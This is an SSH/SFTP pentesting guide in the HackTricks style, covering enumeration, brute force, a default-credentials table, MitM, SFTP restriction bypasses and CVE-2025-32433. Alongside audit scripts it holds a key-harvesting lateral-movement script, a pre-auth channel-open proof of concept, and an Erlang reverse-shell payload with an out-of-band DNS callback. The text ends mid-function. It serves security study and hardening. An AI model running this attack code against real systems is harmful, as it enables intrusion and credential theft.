22 - Pentesting SSH/SFTP


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

SSH (Secure Shell or Secure Socket Shell) is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.

Default port: 22

22/tcp open  ssh     syn-ack

SSH servers:

  • openSSH – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
  • Dropbear – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
  • PuTTY – SSH implementation for Windows; the client is widely used but the server is rarely deployed
  • CopSSH – implementation of OpenSSH for Windows

SSH libraries (implementing the server side):

  • libssh – multiplatform C library implementing the SSHv2 protocol with bindings for Python, Perl and R; used by KDE for sftp and by GitHub for its git SSH infrastructure
  • wolfSSH – SSHv2 server library written in ANSI C and targeted at embedded devices, RTOS and resource-constrained environments
  • Apache MINA SSHD – Apache SSHD Java library based on Apache MINA
  • paramiko – Python SSHv2 protocol library

Enumeration

bash
nc -vn <IP> 22

Automated ssh-audit

ssh-audit is a tool for auditing the configuration of SSH servers and clients.

https://github.com/jtesta/ssh-audit is an updated fork of https://github.com/arthepsy/ssh-audit/

Features:

  • server support for the SSH1 and SSH2 protocols;
  • analyse SSH client configuration;
  • grab the banner, recognise the device or software and operating system, detect compression;
  • gather key-exchange, host-key, encryption and message authentication code algorithms;
  • output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc.);
  • output algorithm recommendations (add or remove based on the recognised software version);
  • output security information (related issues, assigned CVE list, etc.);
  • analyse SSH version compatibility based on algorithm information;
  • historical information from OpenSSH, Dropbear SSH and libssh;
  • runs on Linux and Windows;
  • no dependencies
bash
usage: ssh-audit.py [-1246pbcnjvlt] <host>

  -1,  --ssh1             force ssh version 1 only
  -2,  --ssh2             force ssh version 2 only
  -4,  --ipv4             enable IPv4 (order of precedence)
  -6,  --ipv6             enable IPv6 (order of precedence)
  -p,  --port=<port>      port to connect
  -b,  --batch            batch output
  -c,  --client-audit     starts a server on port 2222 to audit client
                          software config (use -p to change port;
                          use -t to change timeout)
  -n,  --no-colors        disable colors
  -j,  --json             JSON output
  -v,  --verbose          verbose output
  -l,  --level=<level>    minimum output level (info|warn|fail)
  -t,  --timeout=<secs>   timeout (in seconds) for connection and reading
                          (default: 5)
$ python3 ssh-audit.py <IP>

See it in action (Asciinema)

Server SSH public key

bash
ssh-keyscan -t rsa <IP> -p <PORT>   # add ecdsa,ed25519 to -t to fetch the other host key types

Weak cipher algorithms

nmap detects these by default (the ssh2-enum-algos script below lists every algorithm the server offers), and ssh-audit prints the same lists together with a per-algorithm verdict. Note that sslscan and sslyze only speak TLS and are of no use against an SSH service.
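As an added example (not part of the original page, ssh-audit or nmap), the following Python script performs the same algorithm check itself: it parses the server identification string (RFC 4253 section 4.2) and the SSH_MSG_KEXINIT packet a server sends right after the banner (RFC 4253 section 7.1), then flags the algorithms found in a verdict list. The WEAK table is an assumed, shortened version of what ssh-audit knows, and the sample banner and KEXINIT are constructed inline; only the optional `fetch_server_kexinit` touches the network.

```python
import socket
import struct

SSH_MSG_KEXINIT = 20
# Order of the ten name-lists inside KEXINIT (RFC 4253 section 7.1)
KEXINIT_FIELDS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
                  "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")

# Assumed verdict list for the example; ssh-audit ships a far longer one.
WEAK = {
    "diffie-hellman-group1-sha1": "1024-bit DH group with SHA-1",
    "diffie-hellman-group14-sha1": "SHA-1 key exchange",
    "diffie-hellman-group-exchange-sha1": "SHA-1 key exchange",
    "ssh-dss": "DSA host key (1024-bit)",
    "ssh-rsa": "RSA with SHA-1 signatures (disabled by default in OpenSSH 8.8+)",
    "3des-cbc": "64-bit block cipher (Sweet32)",
    "arcfour": "RC4", "arcfour128": "RC4", "arcfour256": "RC4",
    "aes128-cbc": "CBC mode", "aes256-cbc": "CBC mode",
    "hmac-md5": "MD5 MAC", "hmac-sha1-96": "truncated SHA-1 MAC",
}


def parse_banner(line: bytes) -> dict:
    """Split 'SSH-protoversion-softwareversion SP comments' into its parts."""
    text = line.rstrip(b"\r\n").decode("ascii", "replace")
    if not text.startswith("SSH-"):
        raise ValueError("not an SSH identification string: %r" % text)
    ident, _, comments = text.partition(" ")
    _, proto, software = ident.split("-", 2)
    return {"proto": proto, "software": software, "comments": comments}


def _name_list(buf: bytes, off: int):
    """Read one SSH name-list: uint32 length followed by comma-separated ASCII names."""
    (n,) = struct.unpack_from(">I", buf, off)
    names = buf[off + 4:off + 4 + n].decode("ascii")
    return [x for x in names.split(",") if x], off + 4 + n


def parse_kexinit(payload: bytes) -> dict:
    """payload = packet payload (after packet_length and padding_length), starting with byte 20."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT payload")
    off, lists = 17, {}  # 1 byte message code + 16 byte cookie
    for field in KEXINIT_FIELDS:
        lists[field], off = _name_list(payload, off)
    return lists


def weak_algorithms(kexinit: dict) -> dict:
    """Return {field: [(algorithm, reason), ...]} for every flagged algorithm, in server order."""
    findings = {}
    for field, algos in kexinit.items():
        hits = [(a, WEAK[a]) for a in algos if a in WEAK]
        if hits:
            findings[field] = hits
    return findings


def build_kexinit(lists) -> bytes:
    """Encode a KEXINIT payload; used here only to construct sample input."""
    body = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for names in lists:
        raw = ",".join(names).encode("ascii")
        body += struct.pack(">I", len(raw)) + raw
    return body + b"\x00" + b"\x00\x00\x00\x00"  # first_kex_packet_follows, reserved


def fetch_server_kexinit(host: str, port: int = 22, timeout: float = 5.0):
    """Live use: send our banner, read the server banner and its first packet (the KEXINIT)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"SSH-2.0-kexinit-audit-example\r\n")
        f = s.makefile("rb")
        banner = f.readline()
        while banner and not banner.startswith(b"SSH-"):  # servers may send text lines before the banner
            banner = f.readline()
        (plen,) = struct.unpack(">I", f.read(4))
        packet = f.read(plen)
        return banner, packet[1:plen - packet[0]]  # drop padding_length byte and the padding


# Constructed sample input resembling an old OpenSSH 7.4 that still offers legacy algorithms.
SAMPLE_BANNER = b"SSH-2.0-OpenSSH_7.4 Debian-10+deb9u7\r\n"
SAMPLE_KEXINIT = build_kexinit([
    ["curve25519-sha256", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"],
    ["ssh-rsa", "ssh-dss", "ssh-ed25519"],
    ["aes256-gcm@openssh.com", "aes128-cbc", "3des-cbc"],
    ["aes256-gcm@openssh.com", "aes128-cbc", "3des-cbc"],
    ["hmac-sha2-256", "hmac-md5"], ["hmac-sha2-256", "hmac-md5"],
    ["none"], ["none"], [], [],
])


def audit(banner: bytes, kexinit_payload: bytes) -> dict:
    info = parse_banner(banner)
    info["weak"] = weak_algorithms(parse_kexinit(kexinit_payload))
    return info


if __name__ == "__main__":
    report = audit(SAMPLE_BANNER, SAMPLE_KEXINIT)
    print(report["software"], report["comments"])
    for field, hits in report["weak"].items():
        print(f"  {field:8s} " + ", ".join(f"{a} ({why})" for a, why in hits))
```

For a real target replace the two constructed values with `fetch_server_kexinit(host, port)`; the server's KEXINIT is sent in cleartext before any key exchange, so nothing beyond the banner exchange is needed to get the full algorithm inventory.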

Nmap scripts

bash
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

  • ssh

Brute force usernames, passwords and private keys

Username Enumeration

In some OpenSSH versions you can perform a timing attack to enumerate users (OpenSSH up to 7.7 also leaks valid usernames through a malformed-packet bug, CVE-2018-15473). The following Metasploit module implements both checks:

msf> use scanner/ssh/ssh_enumusers

Brute force

Some common SSH credentials can be found here and here and in the table below.

Private Key Brute Force

If you know some SSH private keys that might be in use... let's try them. You can use the nmap script:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Or the MSF auxiliary module:

msf> use scanner/ssh/ssh_identify_pubkeys

Or use ssh-keybrute.py (python3, lightweight and with legacy algorithms enabled): snowdroppe/ssh-keybrute.

Known bad keys can be found here:

ssh-badkeys/authorized at master · rapid7/ssh-badkeys · GitHub

Weak SSH keys / Debian predictable PRNG

Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace that can be brute-forced. Pre-generated sets of keys produced on Debian systems affected by the weak PRNG are available here: g0tmi1k/debian-ssh.

You should look there to search for valid keys for the victim machine.

Kerberos / GSSAPI SSO

If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.

Workflow from a Linux attacker host:

bash
# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>

# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf

# 3) Obtain a TGT for the user
kinit <user>
klist

# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Notes:

  • If you connect using the wrong name (for example a short hostname, an alias, or a wrong entry in /etc/hosts), you may get "Server not found in Kerberos database" because the SPN will not match.
  • crackmapexec ssh --kerberos can also use your ccache for Kerberos auth.

Default credentials

| Vendor | Usernames | Passwords |
| --- | --- | --- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |

SSH-MitM

If you are on the local network of a victim who is going to connect to the SSH server using a username and password, you can try to perform a MitM attack to steal those credentials:

Attack path:

  • Traffic Redirection: The attacker diverts the victim's traffic to their machine, effectively intercepting the connection attempt to the SSH server.
  • Interception and Logging: The attacker's machine acts as a proxy, capturing the user's login details by pretending to be the legitimate SSH server.
  • Command Execution and Relay: Finally, the attacker's server logs the user's credentials, forwards the commands to the real SSH server, executes them, and returns the results to the user, making the process appear seamless and legitimate.

SSH MITM does exactly what is described above.

Keep in mind that the proxy presents its own host key: a client that already has the real key cached will show the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning, so this works best against first-time connections and users who accept the prompt (or run with StrictHostKeyChecking disabled).

To perform the actual MitM you can use techniques such as ARP spoofing, DNS spoofing or the others described in Network Spoofing attacks.

SSH-Snake

If you want to traverse a network using the SSH private keys discovered on systems, using every private key on every system to reach new hosts, then SSH-Snake is what you need.

SSH-Snake performs the following tasks automatically and recursively:

  1. On the current system, find any SSH private keys,
  2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted on,
  3. Attempt to SSH into all of the destinations using all of the private keys discovered,
  4. If a destination is successfully connected to, repeat steps #1 - #4 on the connected-to system.

It is completely self-replicating and self-propagating, and completely fileless.
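As an added example (not SSH-Snake's own code), the following Python script implements the discovery half of that loop, steps 1 and 2, over a constructed set of files and prints the ssh invocations step 3 would run. Everything in SAMPLE_FILES (the key material, hosts, users and history lines) is fabricated for the example; the only real-world assumptions are the file names a foothold usually has (~/.ssh/config, ~/.ssh/known_hosts, shell history files).

```python
import re

# Constructed sample of what a foothold host's files might contain (fake key material, fake hosts).
SAMPLE_FILES = {
    "/home/dev/.ssh/id_ed25519": (
        "-----BEGIN OPENSSH PRIVATE KEY-----\n"
        "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\n"
        "-----END OPENSSH PRIVATE KEY-----\n"),
    "/home/dev/.ssh/config": (
        "Host bastion\n    HostName bastion.corp.example\n    User ops\n"
        "    IdentityFile ~/.ssh/id_ed25519\n\nHost db-*\n    User postgres\n"),
    "/home/dev/.ssh/known_hosts": (
        "10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE\n"
        "|1|c2FsdA==|aGFzaA== ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLE\n"
        "[git.internal]:2222,10.0.0.7 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLE\n"),
    "/home/dev/.bash_history": (
        "ls -la\nssh -i ~/.ssh/id_ed25519 deploy@10.0.0.9\n"
        "scp build.tgz ops@bastion:/tmp/\nssh -p 2222 git@git.internal\n"),
}

PRIVATE_KEY_HEADER = re.compile(r"^-----BEGIN (?:OPENSSH|RSA|DSA|EC|ENCRYPTED) PRIVATE KEY-----", re.M)
USER_AT_HOST = re.compile(r"(?:^|\s)([\w.-]+)@([\w.-]+)")


def find_private_keys(files: dict) -> list:
    """Step 1: files whose content carries a PEM/OpenSSH private-key header."""
    return sorted(p for p, body in files.items() if PRIVATE_KEY_HEADER.search(body))


def parse_ssh_config(text: str) -> dict:
    """Non-wildcard Host aliases -> {hostname, user, port} (wildcard blocks cannot be dialled)."""
    hosts, current = {}, None
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        key, val = parts[0].lower(), " ".join(parts[1:])
        if key == "host":
            current = None if any(c in val for c in "*?!") else hosts.setdefault(val, {})
        elif current is not None and key in ("hostname", "user", "port"):
            current[key] = val
    return hosts


def parse_known_hosts(text: str) -> set:
    """(host, port) pairs; hashed entries (|1|...) cannot be reversed and are skipped."""
    out = set()
    for line in text.splitlines():
        if not line.strip() or line.startswith(("#", "|1|", "@")):
            continue
        for entry in line.split()[0].split(","):
            m = re.fullmatch(r"\[(.+)\]:(\d+)", entry)  # non-default port form [host]:port
            out.add((m.group(1), int(m.group(2))) if m else (entry, 22))
    return out


def parse_history(text: str) -> set:
    """(user, host, port) from ssh/scp/sftp invocations found in shell history."""
    out = set()
    for line in text.splitlines():
        if not re.match(r"\s*(ssh|scp|sftp)\b", line):
            continue
        port = re.search(r"-[pP]\s*(\d+)", line)
        for user, host in USER_AT_HOST.findall(line):
            out.add((user, host, int(port.group(1)) if port else 22))
    return out


def find_destinations(files: dict) -> set:
    """Step 2: every (user, host, port) the discovered keys might be accepted on; user may be None."""
    aliases, dests = {}, set()
    for path, body in files.items():
        if path.endswith("/.ssh/config"):
            aliases.update(parse_ssh_config(body))
        elif path.endswith("/known_hosts"):
            dests |= {(None, h, p) for h, p in parse_known_hosts(body)}
        elif path.endswith("_history"):
            dests |= parse_history(body)
    for alias, cfg in aliases.items():
        dests.add((cfg.get("user"), cfg.get("hostname", alias), int(cfg.get("port", 22))))
    # resolve aliases seen in history (ops@bastion -> ops@bastion.corp.example)
    return {(u or aliases.get(h, {}).get("user"), aliases.get(h, {}).get("hostname", h), p)
            for u, h, p in dests}


def candidate_attempts(keys, dests, fallback_users=("root",)) -> list:
    """Input for step 3: every (key, user, host, port) worth trying; unknown users get the fallback list."""
    attempts = []
    for key in keys:
        for user, host, port in sorted(dests, key=str):
            for u in ([user] if user else fallback_users):
                attempts.append((key, u, host, port))
    return attempts


if __name__ == "__main__":
    keys = find_private_keys(SAMPLE_FILES)
    for key, user, host, port in candidate_attempts(keys, find_destinations(SAMPLE_FILES)):
        print(f"ssh -i {key} -p {port} -o BatchMode=yes -o ConnectTimeout=5 {user}@{host} id")
```

On a real host you would fill the dict by reading ~/.ssh/* and the shell history files of every user you can read; the printed commands use BatchMode so a key that is not accepted fails immediately instead of prompting. The hashed known_hosts entry shows the limit of this approach: once HashKnownHosts is on, the host names are only recoverable by guessing them from other sources.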

Misconfigurations

Root login

It is common for SSH servers to allow root login by default, which is a significant security risk. Disabling root login is a critical hardening step: it removes the one username every brute-force tool tries first and limits what a leaked password is worth. Note that OpenSSH 7.0 and later default to PermitRootLogin prohibit-password (key-based root login only) when the directive is absent or commented out, so an explicit PermitRootLogin yes is what you are looking for during a review.

To Disable Root Login in OpenSSH:

  1. Edit the SSH config file with: sudoedit /etc/ssh/sshd_config
  2. Change the setting from #PermitRootLogin yes to PermitRootLogin no.
  3. Validate the configuration before applying it: sudo sshd -t (a typo here locks you out of the next session, so keep the current one open until you have re-tested).
  4. Restart the SSH server to apply the change: sudo systemctl restart sshd (the unit is named ssh on Debian/Ubuntu). systemctl daemon-reload is not needed: it reloads systemd unit files, not sshd_config.

SFTP Brute Force

SFTP command execution

There is a common oversight in SFTP setups, where administrators intend users to exchange files without enabling remote shell access. Despite giving users a restricted login (a chroot, a wrapper shell, a non-interactive shell such as /usr/bin/nologin) and confining them to a specific directory, a gap remains: users can request the execution of a command (such as /bin/bash) at login time instead of an interactive session. This yields unauthorised command execution and undermines the intended restriction. The caveat: sshd runs a remote command through the user's login shell (`$SHELL -c <command>`), so a real nologin shell blocks this too; the bypass works when the restriction relies on the sftp subsystem configuration, a chroot, or a wrapper that only refuses interactive sessions rather than on the shell itself, or when no ForceCommand is set.

Example from here:

bash
ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Here is an example of a secure SFTP configuration (/etc/ssh/sshd_config – openSSH) for the user noraj:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no

This configuration allows SFTP only: it disables shell access by forcing the start command and disabling TTY allocation, and it also disables every kind of port forwarding and tunneling. Note that sshd refuses the login unless the ChrootDirectory (here the home directory, %h) and every component of its path are owned by root and not writable by any other user, so the user gets a writable subdirectory inside it rather than the chroot root itself.

SFTP Tunneling

If you have access to an SFTP server you can also tunnel your traffic through it, for example using ordinary local port forwarding (this only works when the server has not set AllowTcpForwarding no, as the hardened configuration above does):

bash
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>   # sudo is only needed for local ports below 1024

sftp has a "symlink" command. Therefore, if you have write permissions in some folder, you can create symlinks to other folders/files. As you are probably trapped inside a chroot this will not be especially useful to you, but if you can reach the created symlink from a service that is not chrooted (for example through the web), you could open the symlinked files through that service.

For example, to create a symlink from a new file "froot" to "/":

bash
sftp> symlink / froot

If you can access the file "froot" via the web, you will be able to list the root folder ("/") of the system.

Authentication methods

In high-security environments it is common to enable only key-based or two-factor authentication rather than simple password authentication. But often the stronger methods are enabled without disabling the weaker ones. A frequent case is enabling publickey in the openSSH configuration and making it the preferred method but never disabling password. So by using the verbose mode of the SSH client an attacker can see that a weaker method is still offered:

bash
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

For example, if an authentication failure limit is set and you never get the chance to reach the password method, you can use the PreferredAuthentications option to force the use of this method:

bash
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Reviewing the SSH server configuration is necessary to check that only the expected methods are authorised. Using the verbose mode on the client (or the nmap ssh-auth-methods script above, which reports the same list without a login attempt) helps to verify that the configuration actually has the intended effect.
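The checks in this Misconfigurations section (an explicit PermitRootLogin yes, password and keyboard-interactive left enabled next to publickey, an SFTP-only Match block missing one of the restrictions shown above) can be made mechanical. As an added example (not from the page or from OpenSSH), the following Python script parses an sshd_config into its global and Match sections, applies the OpenSSH defaults assumed in DEFAULTS, and reports findings for a constructed weak configuration next to the hardened one; both configurations are made up for the example.

```python
import re

# Constructed configs for the example. The weak one is what a stock install plus a half-done
# SFTP Match block looks like; the hardened one is what the page recommends.
WEAK_CONFIG = """\
PermitRootLogin yes
PubkeyAuthentication yes
#PasswordAuthentication yes
Subsystem sftp /usr/lib/openssh/sftp-server

Match User noraj
    ChrootDirectory %h
    ForceCommand internal-sftp
"""

HARDENED_CONFIG = """\
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
Subsystem sftp internal-sftp

Match User noraj
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
"""

# OpenSSH defaults the checks rely on (assumed from sshd_config(5) for OpenSSH 7.0 and later)
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "challengeresponseauthentication": "yes",
    "permitemptypasswords": "no",
    "allowtcpforwarding": "yes",
    "permittunnel": "no",
    "x11forwarding": "no",
    "permittty": "yes",
}

# What an SFTP-only Match block is expected to pin down (the page's noraj example)
SFTP_ONLY_EXPECT = {"permittty": "no", "allowtcpforwarding": "no",
                    "x11forwarding": "no", "permittunnel": "no"}


def parse_sshd_config(text: str):
    """Return (global_settings, [(match_criteria, settings), ...]) with lower-cased keywords.
    The `sshd -T` dump (keyword value, one per line) parses with the same function."""
    glob, blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key, val = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            current = {}
            blocks.append((val, current))
        else:
            (glob if current is None else current)[key] = val
    return glob, blocks


def effective(glob: dict, block: dict, key: str) -> str:
    """Value a session matching `block` gets: Match overrides global, global overrides the default."""
    return block.get(key, glob.get(key, DEFAULTS.get(key, ""))).lower()


def audit_sshd_config(text: str) -> list:
    """Findings a pentester would act on; an empty list means nothing obvious to attack."""
    glob, blocks = parse_sshd_config(text)
    findings = []
    g = lambda key: effective(glob, {}, key)
    if g("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root can authenticate with a password")
    if g("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication enabled (OpenSSH default): publickey is not the only method")
    if g("kbdinteractiveauthentication") == "yes" and g("challengeresponseauthentication") == "yes":
        findings.append("keyboard-interactive enabled (OpenSSH default): another password-style method")
    if g("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes")
    for criteria, block in blocks:
        if block.get("forcecommand", "").lower() != "internal-sftp":
            continue
        if "chrootdirectory" not in block and "chrootdirectory" not in glob:
            findings.append(f"Match {criteria}: internal-sftp without ChrootDirectory")
        for key, want in SFTP_ONLY_EXPECT.items():
            got = effective(glob, block, key)
            if got != want:
                findings.append(f"Match {criteria}: {key} is {got!r}, expected {want!r} for an SFTP-only account")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["no findings"])
```

On a live host prefer `sudo sshd -T` (or `sudo sshd -T -C user=noraj` for the view a given account gets) as input rather than the raw file: it prints the effective, defaults-expanded configuration, which removes the guesswork encoded in DEFAULTS and is what the commented-out `#PasswordAuthentication yes` line in the weak sample is meant to illustrate.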

Config files

bash
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

Authentication State-Machine Bypass (Pre-Auth RCE)

Several SSH server implementations contain logic flaws in the authentication finite-state machine that allow a client to send connection-protocol messages before authentication has completed. Because the server does not verify that it is in the expected state, those messages are handled as if the user were fully authenticated, leading to unauthenticated code execution or session creation.

At the protocol level, any SSH message with a message code ≥ 80 (0x50) belongs to the connection layer (RFC 4254) and must only be accepted after authentication has succeeded (RFC 4252). If the server processes one of those messages while still in the SSH_AUTHENTICATION state, an attacker can immediately open a channel and request actions such as command execution, port forwarding, etc.

Generic Exploitation Steps

  1. Establish a TCP connection to the target's SSH port (usually 22, but other services may expose Erlang/OTP on 2022, 830, 2222, ...).
  2. Craft a raw SSH packet (RFC 4253 section 6 framing):
  • 4-byte packet_length (big-endian)
  • 1-byte padding_length, then the payload, then at least 4 bytes of padding so that the whole packet is a multiple of the block size (8 before key exchange)
  • the payload starts with a 1-byte message_code ≥ 80 (e.g. SSH_MSG_CHANNEL_OPEN = 90, SSH_MSG_CHANNEL_REQUEST = 98) followed by the fields that message type expects
  3. Send the packet(s) before completing any authentication step.
  4. Interact with the server APIs that are now exposed pre-auth (command execution, port forwarding, file-system access, ...).

Python proof-of-concept sketch:

python
import socket, struct

HOST, PORT = '10.10.10.10', 22
SSH_MSG_CHANNEL_OPEN = 90

def ssh_packet(payload):
    # RFC 4253 section 6 framing: uint32 packet_length, byte padding_length, payload, padding (>= 4 bytes, total a multiple of 8)
    pad = 8 - ((5 + len(payload)) % 8)
    pad += 8 if pad < 4 else 0
    return struct.pack('>IB', 1 + len(payload) + pad, pad) + payload + b'\x00' * pad

s = socket.create_connection((HOST, PORT))
s.sendall(b'SSH-2.0-OpenSSH_9.0\r\n')   # version exchange: our client banner ...
print(s.recv(4096))                      # ... then the server banner (its KEXINIT may arrive in the same read)
# key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# SSH_MSG_CHANNEL_OPEN for a "session" channel: string "session", uint32 sender channel, window size, max packet (RFC 4254 section 5.1)
payload = bytes([SSH_MSG_CHANNEL_OPEN]) + struct.pack('>I', 7) + b'session' + struct.pack('>III', 0, 1 << 21, 1 << 15)
s.sendall(ssh_packet(payload))
# additional CHANNEL_REQUEST packets can follow to run commands

In practice you will need to complete (or bypass) the key exchange depending on the target implementation, but no authentication is ever performed.


Erlang/OTP sshd (CVE-2025-32433)

  • Affected versions: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
  • Root cause: the Erlang native SSH daemon does not validate the current state before calling ssh_connection:handle_msg/2. Hence any packet with a message code 80-255 reaches the connection handler while the session is still in the userauth state.
  • Impact: unauthenticated remote code execution (the daemon usually runs as root on embedded/OT devices).

Example payload spawning a reverse shell bound to the attacker-controlled channel:

erlang
% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").

Blind RCE / out-of-band detection can be done via DNS:

erlang
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession

Detection and mitigation:

  • Inspect SSH traffic: drop any packet with message code ≥ 80 observed before authentication. This is only possible where the stream is still in cleartext (between the banner and the key exchange, which is exactly the window the OTP bug lives in) or at a device that terminates SSH itself; after key exchange every packet is encrypted.
  • Upgrade Erlang/OTP to 27.3.3 / 26.2.5.11 / 25.3.2.20 or newer.
  • Restrict exposure of the management ports (22/2022/830/2222), especially on OT devices.
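As an added example (not from the page, the advisory or OTP), the following Python script builds the packets the generic steps above describe and runs them through a small per-connection state monitor that implements the first mitigation bullet: flag any connection-layer message (code ≥ 80) from the client before the server has sent SSH_MSG_USERAUTH_SUCCESS. Message numbers and framing follow RFC 4250, 4253 and 4254; the attack stream and the benign exchange are constructed inline and carry no real key material.

```python
import struct

# Message numbers from RFC 4250 section 4.1.2; everything >= 80 is connection protocol (RFC 4254)
SSH_MSG_SERVICE_REQUEST = 5
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
CONNECTION_LAYER_MIN = 80
MSG_NAMES = {80: "GLOBAL_REQUEST", 90: "CHANNEL_OPEN", 98: "CHANNEL_REQUEST"}


def ssh_string(b: bytes) -> bytes:
    """SSH 'string' type: uint32 length followed by the bytes (RFC 4251 section 5)."""
    return struct.pack(">I", len(b)) + b


def ssh_packet(payload: bytes, block: int = 8) -> bytes:
    """RFC 4253 section 6 framing: uint32 packet_length, byte padding_length, payload, padding (>= 4)."""
    pad = block - ((5 + len(payload)) % block)
    if pad < 4:
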